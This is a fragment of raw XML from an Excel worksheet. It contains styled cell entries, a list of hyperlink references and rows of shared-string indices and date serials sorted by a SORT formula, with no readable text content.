      <c r="J996" s="26"/>
      <c r="K996" s="26"/>
      <c r="L996" s="9"/>
      <c r="M996" s="9"/>
      <c r="N996" s="26"/>
      <c r="O996" s="9"/>
      <c r="P996" s="9"/>
      <c r="Q996" s="26"/>
      <c r="R996" s="27"/>
      <c r="S996" s="26"/>
      <c r="T996" s="28"/>
    </row>
    <row r="997">
      <c r="A997" s="24"/>
      <c r="B997" s="25"/>
      <c r="C997" s="26"/>
      <c r="D997" s="26"/>
      <c r="E997" s="9"/>
      <c r="F997" s="9"/>
      <c r="G997" s="26"/>
      <c r="H997" s="26"/>
      <c r="I997" s="26"/>
      <c r="J997" s="26"/>
      <c r="K997" s="26"/>
      <c r="L997" s="9"/>
      <c r="M997" s="9"/>
      <c r="N997" s="26"/>
      <c r="O997" s="9"/>
      <c r="P997" s="9"/>
      <c r="Q997" s="26"/>
      <c r="R997" s="27"/>
      <c r="S997" s="26"/>
      <c r="T997" s="28"/>
    </row>
    <row r="998">
      <c r="A998" s="24"/>
      <c r="B998" s="25"/>
      <c r="C998" s="26"/>
      <c r="D998" s="26"/>
      <c r="E998" s="9"/>
      <c r="F998" s="9"/>
      <c r="G998" s="26"/>
      <c r="H998" s="26"/>
      <c r="I998" s="26"/>
      <c r="J998" s="26"/>
      <c r="K998" s="26"/>
      <c r="L998" s="9"/>
      <c r="M998" s="9"/>
      <c r="N998" s="26"/>
      <c r="O998" s="9"/>
      <c r="P998" s="9"/>
      <c r="Q998" s="26"/>
      <c r="R998" s="27"/>
      <c r="S998" s="26"/>
      <c r="T998" s="28"/>
    </row>
    <row r="999">
      <c r="A999" s="24"/>
      <c r="B999" s="25"/>
      <c r="C999" s="26"/>
      <c r="D999" s="26"/>
      <c r="E999" s="9"/>
      <c r="F999" s="9"/>
      <c r="G999" s="26"/>
      <c r="H999" s="26"/>
      <c r="I999" s="26"/>
      <c r="J999" s="26"/>
      <c r="K999" s="26"/>
      <c r="L999" s="9"/>
      <c r="M999" s="9"/>
      <c r="N999" s="26"/>
      <c r="O999" s="9"/>
      <c r="P999" s="9"/>
      <c r="Q999" s="26"/>
      <c r="R999" s="27"/>
      <c r="S999" s="26"/>
      <c r="T999" s="28"/>
    </row>
    <row r="1000">
      <c r="A1000" s="24"/>
      <c r="B1000" s="25"/>
      <c r="C1000" s="26"/>
      <c r="D1000" s="26"/>
      <c r="E1000" s="9"/>
      <c r="F1000" s="9"/>
      <c r="G1000" s="26"/>
      <c r="H1000" s="26"/>
      <c r="I1000" s="26"/>
      <c r="J1000" s="26"/>
      <c r="K1000" s="26"/>
      <c r="L1000" s="9"/>
      <c r="M1000" s="9"/>
      <c r="N1000" s="26"/>
      <c r="O1000" s="9"/>
      <c r="P1000" s="9"/>
      <c r="Q1000" s="26"/>
      <c r="R1000" s="27"/>
      <c r="S1000" s="26"/>
      <c r="T1000" s="28"/>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31"/>
    <hyperlink r:id="rId29" ref="P32"/>
    <hyperlink r:id="rId30" ref="P33"/>
    <hyperlink r:id="rId31" ref="P34"/>
    <hyperlink r:id="rId32" ref="P35"/>
    <hyperlink r:id="rId33" ref="P36"/>
    <hyperlink r:id="rId34" ref="P37"/>
    <hyperlink r:id="rId35" ref="P38"/>
    <hyperlink r:id="rId36" ref="P39"/>
    <hyperlink r:id="rId37" ref="P40"/>
    <hyperlink r:id="rId38" ref="P41"/>
    <hyperlink r:id="rId39" ref="P42"/>
    <hyperlink r:id="rId40" ref="P43"/>
    <hyperlink r:id="rId41" ref="L44"/>
    <hyperlink r:id="rId42" ref="M44"/>
    <hyperlink r:id="rId43" ref="P44"/>
    <hyperlink r:id="rId44" ref="P45"/>
    <hyperlink r:id="rId45" ref="P46"/>
    <hyperlink r:id="rId46" ref="E47"/>
    <hyperlink r:id="rId47" ref="P47"/>
    <hyperlink r:id="rId48" ref="P48"/>
    <hyperlink r:id="rId49" ref="P49"/>
    <hyperlink r:id="rId50" ref="P50"/>
    <hyperlink r:id="rId51" ref="P51"/>
    <hyperlink r:id="rId52" ref="O52"/>
    <hyperlink r:id="rId53" ref="P52"/>
    <hyperlink r:id="rId54" ref="O53"/>
    <hyperlink r:id="rId55" ref="P53"/>
    <hyperlink r:id="rId56" ref="O54"/>
    <hyperlink r:id="rId57" ref="P54"/>
    <hyperlink r:id="rId58" ref="P55"/>
    <hyperlink r:id="rId59" ref="O56"/>
    <hyperlink r:id="rId60" ref="P56"/>
    <hyperlink r:id="rId61" ref="O57"/>
    <hyperlink r:id="rId62" ref="P57"/>
    <hyperlink r:id="rId63" ref="O58"/>
    <hyperlink r:id="rId64" ref="P58"/>
    <hyperlink r:id="rId65" ref="O59"/>
    <hyperlink r:id="rId66" ref="P59"/>
    <hyperlink r:id="rId67" ref="P60"/>
    <hyperlink r:id="rId68" ref="P61"/>
    <hyperlink r:id="rId69" ref="P62"/>
    <hyperlink r:id="rId70" ref="P63"/>
    <hyperlink r:id="rId71" ref="P64"/>
    <hyperlink r:id="rId72" ref="P65"/>
    <hyperlink r:id="rId73" ref="P66"/>
    <hyperlink r:id="rId74" ref="P67"/>
    <hyperlink r:id="rId75" ref="P68"/>
    <hyperlink r:id="rId76" ref="P69"/>
    <hyperlink r:id="rId77" ref="P70"/>
    <hyperlink r:id="rId78" ref="O71"/>
    <hyperlink r:id="rId79" ref="P71"/>
    <hyperlink r:id="rId80" ref="O72"/>
    <hyperlink r:id="rId81" ref="P72"/>
    <hyperlink r:id="rId82" ref="P73"/>
    <hyperlink r:id="rId83" ref="P74"/>
    <hyperlink r:id="rId84" ref="O75"/>
    <hyperlink r:id="rId85" ref="P75"/>
    <hyperlink r:id="rId86" ref="P76"/>
    <hyperlink r:id="rId87" ref="P77"/>
    <hyperlink r:id="rId88" ref="O78"/>
    <hyperlink r:id="rId89" ref="P78"/>
    <hyperlink r:id="rId90" ref="O79"/>
    <hyperlink r:id="rId91" ref="P79"/>
    <hyperlink r:id="rId92" ref="O80"/>
    <hyperlink r:id="rId93" ref="P80"/>
    <hyperlink r:id="rId94" ref="O81"/>
    <hyperlink r:id="rId95" ref="P81"/>
    <hyperlink r:id="rId96" ref="O82"/>
    <hyperlink r:id="rId97" ref="P82"/>
    <hyperlink r:id="rId98" ref="O83"/>
    <hyperlink r:id="rId99" ref="P83"/>
    <hyperlink r:id="rId100" ref="O84"/>
    <hyperlink r:id="rId101" ref="P84"/>
    <hyperlink r:id="rId102" ref="O85"/>
    <hyperlink r:id="rId103" ref="P85"/>
    <hyperlink r:id="rId104" ref="O86"/>
    <hyperlink r:id="rId105" ref="P86"/>
    <hyperlink r:id="rId106" ref="P87"/>
    <hyperlink r:id="rId107" ref="P88"/>
    <hyperlink r:id="rId108" ref="P89"/>
    <hyperlink r:id="rId109" ref="P90"/>
    <hyperlink r:id="rId110" ref="P91"/>
    <hyperlink r:id="rId111" ref="O92"/>
    <hyperlink r:id="rId112" ref="P92"/>
    <hyperlink r:id="rId113" ref="O93"/>
    <hyperlink r:id="rId114" ref="P93"/>
    <hyperlink r:id="rId115" ref="P94"/>
    <hyperlink r:id="rId116" ref="P95"/>
    <hyperlink r:id="rId117" ref="P96"/>
    <hyperlink r:id="rId118" ref="P97"/>
    <hyperlink r:id="rId119" ref="P98"/>
    <hyperlink r:id="rId120" ref="P99"/>
    <hyperlink r:id="rId121" ref="P100"/>
    <hyperlink r:id="rId122" ref="P101"/>
    <hyperlink r:id="rId123" ref="P102"/>
    <hyperlink r:id="rId124" ref="P103"/>
    <hyperlink r:id="rId125" ref="P104"/>
    <hyperlink r:id="rId126" ref="P105"/>
    <hyperlink r:id="rId127" ref="P106"/>
    <hyperlink r:id="rId128" ref="O107"/>
    <hyperlink r:id="rId129" ref="P107"/>
    <hyperlink r:id="rId130" ref="O108"/>
    <hyperlink r:id="rId131" ref="P108"/>
    <hyperlink r:id="rId132" ref="O109"/>
    <hyperlink r:id="rId133" ref="P109"/>
    <hyperlink r:id="rId134" ref="L110"/>
    <hyperlink r:id="rId135" ref="P110"/>
    <hyperlink r:id="rId136" ref="P111"/>
    <hyperlink r:id="rId137" ref="O112"/>
    <hyperlink r:id="rId138" ref="P112"/>
    <hyperlink r:id="rId139" ref="O113"/>
    <hyperlink r:id="rId140" ref="P113"/>
    <hyperlink r:id="rId141" ref="O114"/>
    <hyperlink r:id="rId142" ref="P114"/>
    <hyperlink r:id="rId143" ref="O115"/>
    <hyperlink r:id="rId144" ref="P115"/>
    <hyperlink r:id="rId145" ref="O116"/>
    <hyperlink r:id="rId146" ref="P116"/>
    <hyperlink r:id="rId147" ref="O117"/>
    <hyperlink r:id="rId148" ref="P117"/>
    <hyperlink r:id="rId149" ref="O118"/>
    <hyperlink r:id="rId150" ref="P118"/>
    <hyperlink r:id="rId151" ref="O119"/>
    <hyperlink r:id="rId152" ref="P119"/>
    <hyperlink r:id="rId153" ref="P120"/>
    <hyperlink r:id="rId154" ref="P121"/>
  </hyperlinks>
  <drawing r:id="rId15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3" t="s">
        <v>3</v>
      </c>
      <c r="E1" s="4" t="s">
        <v>4</v>
      </c>
      <c r="F1" s="4" t="s">
        <v>5</v>
      </c>
      <c r="G1" s="3" t="s">
        <v>6</v>
      </c>
      <c r="H1" s="2" t="s">
        <v>7</v>
      </c>
      <c r="I1" s="3" t="s">
        <v>8</v>
      </c>
      <c r="J1" s="3" t="s">
        <v>9</v>
      </c>
      <c r="K1" s="3" t="s">
        <v>10</v>
      </c>
      <c r="L1" s="4" t="s">
        <v>11</v>
      </c>
      <c r="M1" s="4" t="s">
        <v>12</v>
      </c>
      <c r="N1" s="3" t="s">
        <v>13</v>
      </c>
      <c r="O1" s="2" t="s">
        <v>14</v>
      </c>
      <c r="P1" s="4" t="s">
        <v>15</v>
      </c>
      <c r="Q1" s="3" t="s">
        <v>16</v>
      </c>
      <c r="R1" s="3" t="s">
        <v>17</v>
      </c>
      <c r="S1" s="3" t="s">
        <v>18</v>
      </c>
      <c r="T1" s="5" t="s">
        <v>19</v>
      </c>
    </row>
    <row r="2" ht="51.0" customHeight="1">
      <c r="A2" s="29">
        <f t="array" ref="A2:T121">SORT('Аркуш1'!A2:T121,2,true)</f>
        <v>44215</v>
      </c>
      <c r="B2" s="30">
        <v>44215.0</v>
      </c>
      <c r="C2" s="31" t="s">
        <v>35</v>
      </c>
      <c r="D2" s="31" t="s">
        <v>490</v>
      </c>
      <c r="E2" s="31" t="s">
        <v>22</v>
      </c>
      <c r="F2" s="31" t="s">
        <v>628</v>
      </c>
      <c r="G2" s="31" t="s">
        <v>680</v>
      </c>
      <c r="H2" s="31" t="s">
        <v>681</v>
      </c>
      <c r="I2" s="31" t="s">
        <v>240</v>
      </c>
      <c r="J2" s="31" t="s">
        <v>241</v>
      </c>
      <c r="K2" s="31" t="s">
        <v>64</v>
      </c>
      <c r="L2" s="31" t="s">
        <v>682</v>
      </c>
      <c r="M2" s="31" t="s">
        <v>683</v>
      </c>
      <c r="N2" s="31" t="s">
        <v>626</v>
      </c>
      <c r="O2" s="31" t="s">
        <v>684</v>
      </c>
      <c r="P2" s="32" t="s">
        <v>685</v>
      </c>
      <c r="Q2" s="31" t="s">
        <v>34</v>
      </c>
      <c r="R2" s="33" t="s">
        <v>35</v>
      </c>
      <c r="S2" s="33" t="s">
        <v>35</v>
      </c>
      <c r="T2" s="28" t="s">
        <v>35</v>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="30">
        <v>44232.0</v>
      </c>
      <c r="B3" s="30">
        <v>44231.0</v>
      </c>
      <c r="C3" s="31" t="s">
        <v>35</v>
      </c>
      <c r="D3" s="31" t="s">
        <v>296</v>
      </c>
      <c r="E3" s="31" t="s">
        <v>22</v>
      </c>
      <c r="F3" s="31" t="s">
        <v>194</v>
      </c>
      <c r="G3" s="31" t="s">
        <v>35</v>
      </c>
      <c r="H3" s="31" t="s">
        <v>677</v>
      </c>
      <c r="I3" s="31" t="s">
        <v>240</v>
      </c>
      <c r="J3" s="31" t="s">
        <v>241</v>
      </c>
      <c r="K3" s="31" t="s">
        <v>291</v>
      </c>
      <c r="L3" s="31" t="s">
        <v>678</v>
      </c>
      <c r="M3" s="31" t="s">
        <v>35</v>
      </c>
      <c r="N3" s="31" t="s">
        <v>35</v>
      </c>
      <c r="O3" s="31" t="s">
        <v>679</v>
      </c>
      <c r="P3" s="32" t="s">
        <v>452</v>
      </c>
      <c r="Q3" s="31" t="s">
        <v>34</v>
      </c>
      <c r="R3" s="33" t="s">
        <v>35</v>
      </c>
      <c r="S3" s="33" t="s">
        <v>35</v>
      </c>
      <c r="T3" s="28" t="s">
        <v>35</v>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="30">
        <v>44272.0</v>
      </c>
      <c r="B4" s="34">
        <v>44257.0</v>
      </c>
      <c r="C4" s="31" t="s">
        <v>35</v>
      </c>
      <c r="D4" s="31" t="s">
        <v>35</v>
      </c>
      <c r="E4" s="31" t="s">
        <v>367</v>
      </c>
      <c r="F4" s="31" t="s">
        <v>35</v>
      </c>
      <c r="G4" s="31" t="s">
        <v>391</v>
      </c>
      <c r="H4" s="31" t="s">
        <v>35</v>
      </c>
      <c r="I4" s="31" t="s">
        <v>392</v>
      </c>
      <c r="J4" s="31" t="s">
        <v>393</v>
      </c>
      <c r="K4" s="31" t="s">
        <v>394</v>
      </c>
      <c r="L4" s="31" t="s">
        <v>35</v>
      </c>
      <c r="M4" s="31" t="s">
        <v>35</v>
      </c>
      <c r="N4" s="31" t="s">
        <v>35</v>
      </c>
      <c r="O4" s="31" t="s">
        <v>395</v>
      </c>
      <c r="P4" s="32" t="s">
        <v>396</v>
      </c>
      <c r="Q4" s="31" t="s">
        <v>132</v>
      </c>
      <c r="R4" s="33" t="s">
        <v>397</v>
      </c>
      <c r="S4" s="31" t="s">
        <v>35</v>
      </c>
      <c r="T4" s="28" t="s">
        <v>398</v>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="30">
        <v>44272.0</v>
      </c>
      <c r="B5" s="34">
        <v>44257.0</v>
      </c>
      <c r="C5" s="31" t="s">
        <v>35</v>
      </c>
      <c r="D5" s="31" t="s">
        <v>35</v>
      </c>
      <c r="E5" s="31" t="s">
        <v>367</v>
      </c>
      <c r="F5" s="31" t="s">
        <v>35</v>
      </c>
      <c r="G5" s="31" t="s">
        <v>399</v>
      </c>
      <c r="H5" s="31" t="s">
        <v>35</v>
      </c>
      <c r="I5" s="31" t="s">
        <v>270</v>
      </c>
      <c r="J5" s="31" t="s">
        <v>271</v>
      </c>
      <c r="K5" s="31" t="s">
        <v>369</v>
      </c>
      <c r="L5" s="31" t="s">
        <v>35</v>
      </c>
      <c r="M5" s="31" t="s">
        <v>35</v>
      </c>
      <c r="N5" s="31" t="s">
        <v>35</v>
      </c>
      <c r="O5" s="31" t="s">
        <v>400</v>
      </c>
      <c r="P5" s="32" t="s">
        <v>396</v>
      </c>
      <c r="Q5" s="31" t="s">
        <v>132</v>
      </c>
      <c r="R5" s="33" t="s">
        <v>401</v>
      </c>
      <c r="S5" s="31" t="s">
        <v>35</v>
      </c>
      <c r="T5" s="28" t="s">
        <v>402</v>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="30">
        <v>44272.0</v>
      </c>
      <c r="B6" s="34">
        <v>44257.0</v>
      </c>
      <c r="C6" s="31" t="s">
        <v>35</v>
      </c>
      <c r="D6" s="31" t="s">
        <v>35</v>
      </c>
      <c r="E6" s="31" t="s">
        <v>367</v>
      </c>
      <c r="F6" s="31" t="s">
        <v>35</v>
      </c>
      <c r="G6" s="31" t="s">
        <v>399</v>
      </c>
      <c r="H6" s="31" t="s">
        <v>35</v>
      </c>
      <c r="I6" s="31" t="s">
        <v>270</v>
      </c>
      <c r="J6" s="31" t="s">
        <v>271</v>
      </c>
      <c r="K6" s="31" t="s">
        <v>403</v>
      </c>
      <c r="L6" s="31" t="s">
        <v>35</v>
      </c>
      <c r="M6" s="31" t="s">
        <v>35</v>
      </c>
      <c r="N6" s="31" t="s">
        <v>35</v>
      </c>
      <c r="O6" s="31" t="s">
        <v>404</v>
      </c>
      <c r="P6" s="32" t="s">
        <v>396</v>
      </c>
      <c r="Q6" s="31" t="s">
        <v>132</v>
      </c>
      <c r="R6" s="33" t="s">
        <v>405</v>
      </c>
      <c r="S6" s="31" t="s">
        <v>35</v>
      </c>
      <c r="T6" s="28" t="s">
        <v>402</v>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="30">
        <v>44272.0</v>
      </c>
      <c r="B7" s="34">
        <v>44257.0</v>
      </c>
      <c r="C7" s="31" t="s">
        <v>35</v>
      </c>
      <c r="D7" s="31" t="s">
        <v>35</v>
      </c>
      <c r="E7" s="31" t="s">
        <v>367</v>
      </c>
      <c r="F7" s="31" t="s">
        <v>35</v>
      </c>
      <c r="G7" s="31" t="s">
        <v>399</v>
      </c>
      <c r="H7" s="31" t="s">
        <v>35</v>
      </c>
      <c r="I7" s="31" t="s">
        <v>270</v>
      </c>
      <c r="J7" s="31" t="s">
        <v>271</v>
      </c>
      <c r="K7" s="31" t="s">
        <v>403</v>
      </c>
      <c r="L7" s="31" t="s">
        <v>35</v>
      </c>
      <c r="M7" s="31" t="s">
        <v>35</v>
      </c>
      <c r="N7" s="31" t="s">
        <v>35</v>
      </c>
      <c r="O7" s="31" t="s">
        <v>406</v>
      </c>
      <c r="P7" s="32" t="s">
        <v>396</v>
      </c>
      <c r="Q7" s="31" t="s">
        <v>132</v>
      </c>
      <c r="R7" s="33" t="s">
        <v>407</v>
      </c>
      <c r="S7" s="31" t="s">
        <v>35</v>
      </c>
      <c r="T7" s="28" t="s">
        <v>402</v>
      </c>
    </row>
    <row r="8" ht="55.5" customHeight="1">
      <c r="A8" s="30">
        <v>44258.0</v>
      </c>
      <c r="B8" s="30">
        <v>44257.0</v>
      </c>
      <c r="C8" s="31" t="s">
        <v>35</v>
      </c>
      <c r="D8" s="31" t="s">
        <v>112</v>
      </c>
      <c r="E8" s="31" t="s">
        <v>408</v>
      </c>
      <c r="F8" s="31" t="s">
        <v>35</v>
      </c>
      <c r="G8" s="31" t="s">
        <v>409</v>
      </c>
      <c r="H8" s="31" t="s">
        <v>410</v>
      </c>
      <c r="I8" s="31" t="s">
        <v>411</v>
      </c>
      <c r="J8" s="31" t="s">
        <v>412</v>
      </c>
      <c r="K8" s="31" t="s">
        <v>413</v>
      </c>
      <c r="L8" s="31" t="s">
        <v>686</v>
      </c>
      <c r="M8" s="31" t="s">
        <v>687</v>
      </c>
      <c r="N8" s="31" t="s">
        <v>35</v>
      </c>
      <c r="O8" s="31" t="s">
        <v>416</v>
      </c>
      <c r="P8" s="32" t="s">
        <v>417</v>
      </c>
      <c r="Q8" s="31" t="s">
        <v>34</v>
      </c>
      <c r="R8" s="33" t="s">
        <v>418</v>
      </c>
      <c r="S8" s="31" t="s">
        <v>35</v>
      </c>
      <c r="T8" s="28" t="s">
        <v>258</v>
      </c>
    </row>
    <row r="9" ht="61.5" customHeight="1">
      <c r="A9" s="30">
        <v>44258.0</v>
      </c>
      <c r="B9" s="30">
        <v>44258.0</v>
      </c>
      <c r="C9" s="31" t="s">
        <v>35</v>
      </c>
      <c r="D9" s="31" t="s">
        <v>296</v>
      </c>
      <c r="E9" s="31" t="s">
        <v>22</v>
      </c>
      <c r="F9" s="31" t="s">
        <v>674</v>
      </c>
      <c r="G9" s="31" t="s">
        <v>622</v>
      </c>
      <c r="H9" s="31" t="s">
        <v>346</v>
      </c>
      <c r="I9" s="31" t="s">
        <v>240</v>
      </c>
      <c r="J9" s="31" t="s">
        <v>241</v>
      </c>
      <c r="K9" s="31" t="s">
        <v>64</v>
      </c>
      <c r="L9" s="31" t="s">
        <v>675</v>
      </c>
      <c r="M9" s="31" t="s">
        <v>625</v>
      </c>
      <c r="N9" s="31" t="s">
        <v>626</v>
      </c>
      <c r="O9" s="31" t="s">
        <v>688</v>
      </c>
      <c r="P9" s="32" t="s">
        <v>452</v>
      </c>
      <c r="Q9" s="31" t="s">
        <v>34</v>
      </c>
      <c r="R9" s="33" t="s">
        <v>35</v>
      </c>
      <c r="S9" s="33" t="s">
        <v>35</v>
      </c>
      <c r="T9" s="28" t="s">
        <v>35</v>
      </c>
    </row>
    <row r="10" ht="42.0" customHeight="1">
      <c r="A10" s="30">
        <v>44264.0</v>
      </c>
      <c r="B10" s="30">
        <v>44264.0</v>
      </c>
      <c r="C10" s="31" t="s">
        <v>35</v>
      </c>
      <c r="D10" s="31" t="s">
        <v>296</v>
      </c>
      <c r="E10" s="31" t="s">
        <v>22</v>
      </c>
      <c r="F10" s="31" t="s">
        <v>344</v>
      </c>
      <c r="G10" s="31" t="s">
        <v>622</v>
      </c>
      <c r="H10" s="31" t="s">
        <v>346</v>
      </c>
      <c r="I10" s="31" t="s">
        <v>240</v>
      </c>
      <c r="J10" s="31" t="s">
        <v>241</v>
      </c>
      <c r="K10" s="31" t="s">
        <v>64</v>
      </c>
      <c r="L10" s="31" t="s">
        <v>672</v>
      </c>
      <c r="M10" s="31" t="s">
        <v>625</v>
      </c>
      <c r="N10" s="31" t="s">
        <v>626</v>
      </c>
      <c r="O10" s="31" t="s">
        <v>689</v>
      </c>
      <c r="P10" s="32" t="s">
        <v>452</v>
      </c>
      <c r="Q10" s="31" t="s">
        <v>34</v>
      </c>
      <c r="R10" s="33" t="s">
        <v>35</v>
      </c>
      <c r="S10" s="33" t="s">
        <v>35</v>
      </c>
      <c r="T10" s="28" t="s">
        <v>35</v>
      </c>
    </row>
    <row r="11" ht="50.25" customHeight="1">
      <c r="A11" s="30">
        <v>44278.0</v>
      </c>
      <c r="B11" s="30">
        <v>44277.0</v>
      </c>
      <c r="C11" s="31" t="s">
        <v>35</v>
      </c>
      <c r="D11" s="31" t="s">
        <v>296</v>
      </c>
      <c r="E11" s="31" t="s">
        <v>22</v>
      </c>
      <c r="F11" s="31" t="s">
        <v>344</v>
      </c>
      <c r="G11" s="31" t="s">
        <v>669</v>
      </c>
      <c r="H11" s="31" t="s">
        <v>346</v>
      </c>
      <c r="I11" s="31" t="s">
        <v>240</v>
      </c>
      <c r="J11" s="31" t="s">
        <v>241</v>
      </c>
      <c r="K11" s="31" t="s">
        <v>64</v>
      </c>
      <c r="L11" s="31" t="s">
        <v>670</v>
      </c>
      <c r="M11" s="31" t="s">
        <v>625</v>
      </c>
      <c r="N11" s="31" t="s">
        <v>626</v>
      </c>
      <c r="O11" s="31" t="s">
        <v>690</v>
      </c>
      <c r="P11" s="32" t="s">
        <v>452</v>
      </c>
      <c r="Q11" s="31" t="s">
        <v>34</v>
      </c>
      <c r="R11" s="33" t="s">
        <v>35</v>
      </c>
      <c r="S11" s="33" t="s">
        <v>35</v>
      </c>
      <c r="T11" s="28" t="s">
        <v>35</v>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="30">
        <v>44282.0</v>
      </c>
      <c r="B12" s="30">
        <v>44280.0</v>
      </c>
      <c r="C12" s="31" t="s">
        <v>35</v>
      </c>
      <c r="D12" s="31" t="s">
        <v>35</v>
      </c>
      <c r="E12" s="31" t="s">
        <v>656</v>
      </c>
      <c r="F12" s="31" t="s">
        <v>35</v>
      </c>
      <c r="G12" s="31" t="s">
        <v>35</v>
      </c>
      <c r="H12" s="31" t="s">
        <v>35</v>
      </c>
      <c r="I12" s="31" t="s">
        <v>270</v>
      </c>
      <c r="J12" s="31" t="s">
        <v>271</v>
      </c>
      <c r="K12" s="31" t="s">
        <v>42</v>
      </c>
      <c r="L12" s="31" t="s">
        <v>35</v>
      </c>
      <c r="M12" s="31" t="s">
        <v>35</v>
      </c>
      <c r="N12" s="31" t="s">
        <v>35</v>
      </c>
      <c r="O12" s="31" t="s">
        <v>691</v>
      </c>
      <c r="P12" s="32" t="s">
        <v>452</v>
      </c>
      <c r="Q12" s="31" t="s">
        <v>275</v>
      </c>
      <c r="R12" s="33" t="s">
        <v>658</v>
      </c>
      <c r="S12" s="31" t="s">
        <v>659</v>
      </c>
      <c r="T12" s="28" t="s">
        <v>567</v>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="30">
        <v>44282.0</v>
      </c>
      <c r="B13" s="30">
        <v>44280.0</v>
      </c>
      <c r="C13" s="31" t="s">
        <v>35</v>
      </c>
      <c r="D13" s="31" t="s">
        <v>35</v>
      </c>
      <c r="E13" s="31" t="s">
        <v>656</v>
      </c>
      <c r="F13" s="31" t="s">
        <v>35</v>
      </c>
      <c r="G13" s="31" t="s">
        <v>35</v>
      </c>
      <c r="H13" s="31" t="s">
        <v>35</v>
      </c>
      <c r="I13" s="31" t="s">
        <v>270</v>
      </c>
      <c r="J13" s="31" t="s">
        <v>271</v>
      </c>
      <c r="K13" s="31" t="s">
        <v>660</v>
      </c>
      <c r="L13" s="31" t="s">
        <v>35</v>
      </c>
      <c r="M13" s="31" t="s">
        <v>35</v>
      </c>
      <c r="N13" s="31" t="s">
        <v>35</v>
      </c>
      <c r="O13" s="31" t="s">
        <v>691</v>
      </c>
      <c r="P13" s="32" t="s">
        <v>452</v>
      </c>
      <c r="Q13" s="31" t="s">
        <v>275</v>
      </c>
      <c r="R13" s="33" t="s">
        <v>662</v>
      </c>
      <c r="S13" s="31" t="s">
        <v>607</v>
      </c>
      <c r="T13" s="28" t="s">
        <v>459</v>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="30">
        <v>44282.0</v>
      </c>
      <c r="B14" s="30">
        <v>44280.0</v>
      </c>
      <c r="C14" s="31" t="s">
        <v>35</v>
      </c>
      <c r="D14" s="31" t="s">
        <v>35</v>
      </c>
      <c r="E14" s="31" t="s">
        <v>656</v>
      </c>
      <c r="F14" s="31" t="s">
        <v>35</v>
      </c>
      <c r="G14" s="31" t="s">
        <v>35</v>
      </c>
      <c r="H14" s="31" t="s">
        <v>35</v>
      </c>
      <c r="I14" s="31" t="s">
        <v>270</v>
      </c>
      <c r="J14" s="31" t="s">
        <v>271</v>
      </c>
      <c r="K14" s="31" t="s">
        <v>42</v>
      </c>
      <c r="L14" s="31" t="s">
        <v>35</v>
      </c>
      <c r="M14" s="31" t="s">
        <v>35</v>
      </c>
      <c r="N14" s="31" t="s">
        <v>35</v>
      </c>
      <c r="O14" s="31" t="s">
        <v>691</v>
      </c>
      <c r="P14" s="32" t="s">
        <v>452</v>
      </c>
      <c r="Q14" s="31" t="s">
        <v>275</v>
      </c>
      <c r="R14" s="33" t="s">
        <v>664</v>
      </c>
      <c r="S14" s="31" t="s">
        <v>607</v>
      </c>
      <c r="T14" s="28" t="s">
        <v>459</v>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="30">
        <v>44282.0</v>
      </c>
      <c r="B15" s="30">
        <v>44280.0</v>
      </c>
      <c r="C15" s="31" t="s">
        <v>35</v>
      </c>
      <c r="D15" s="31" t="s">
        <v>35</v>
      </c>
      <c r="E15" s="31" t="s">
        <v>656</v>
      </c>
      <c r="F15" s="31" t="s">
        <v>35</v>
      </c>
      <c r="G15" s="31" t="s">
        <v>35</v>
      </c>
      <c r="H15" s="31" t="s">
        <v>35</v>
      </c>
      <c r="I15" s="31" t="s">
        <v>270</v>
      </c>
      <c r="J15" s="31" t="s">
        <v>271</v>
      </c>
      <c r="K15" s="31" t="s">
        <v>42</v>
      </c>
      <c r="L15" s="31" t="s">
        <v>35</v>
      </c>
      <c r="M15" s="31" t="s">
        <v>35</v>
      </c>
      <c r="N15" s="31" t="s">
        <v>35</v>
      </c>
      <c r="O15" s="31" t="s">
        <v>691</v>
      </c>
      <c r="P15" s="32" t="s">
        <v>452</v>
      </c>
      <c r="Q15" s="31" t="s">
        <v>275</v>
      </c>
      <c r="R15" s="33" t="s">
        <v>666</v>
      </c>
      <c r="S15" s="31" t="s">
        <v>542</v>
      </c>
      <c r="T15" s="28" t="s">
        <v>563</v>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="30">
        <v>44282.0</v>
      </c>
      <c r="B16" s="30">
        <v>44280.0</v>
      </c>
      <c r="C16" s="31" t="s">
        <v>35</v>
      </c>
      <c r="D16" s="31" t="s">
        <v>35</v>
      </c>
      <c r="E16" s="31" t="s">
        <v>656</v>
      </c>
      <c r="F16" s="31" t="s">
        <v>35</v>
      </c>
      <c r="G16" s="31" t="s">
        <v>35</v>
      </c>
      <c r="H16" s="31" t="s">
        <v>35</v>
      </c>
      <c r="I16" s="31" t="s">
        <v>270</v>
      </c>
      <c r="J16" s="31" t="s">
        <v>271</v>
      </c>
      <c r="K16" s="31" t="s">
        <v>42</v>
      </c>
      <c r="L16" s="31" t="s">
        <v>35</v>
      </c>
      <c r="M16" s="31" t="s">
        <v>35</v>
      </c>
      <c r="N16" s="31" t="s">
        <v>35</v>
      </c>
      <c r="O16" s="31" t="s">
        <v>691</v>
      </c>
      <c r="P16" s="32" t="s">
        <v>452</v>
      </c>
      <c r="Q16" s="31" t="s">
        <v>275</v>
      </c>
      <c r="R16" s="33" t="s">
        <v>668</v>
      </c>
      <c r="S16" s="31" t="s">
        <v>522</v>
      </c>
      <c r="T16" s="28" t="s">
        <v>402</v>
      </c>
    </row>
    <row r="17" ht="87.75" customHeight="1">
      <c r="A17" s="30">
        <v>44294.0</v>
      </c>
      <c r="B17" s="30">
        <v>44293.0</v>
      </c>
      <c r="C17" s="31" t="s">
        <v>35</v>
      </c>
      <c r="D17" s="31" t="s">
        <v>296</v>
      </c>
      <c r="E17" s="31" t="s">
        <v>22</v>
      </c>
      <c r="F17" s="31" t="s">
        <v>649</v>
      </c>
      <c r="G17" s="31" t="s">
        <v>641</v>
      </c>
      <c r="H17" s="31" t="s">
        <v>650</v>
      </c>
      <c r="I17" s="31" t="s">
        <v>643</v>
      </c>
      <c r="J17" s="31" t="s">
        <v>644</v>
      </c>
      <c r="K17" s="31" t="s">
        <v>645</v>
      </c>
      <c r="L17" s="31" t="s">
        <v>651</v>
      </c>
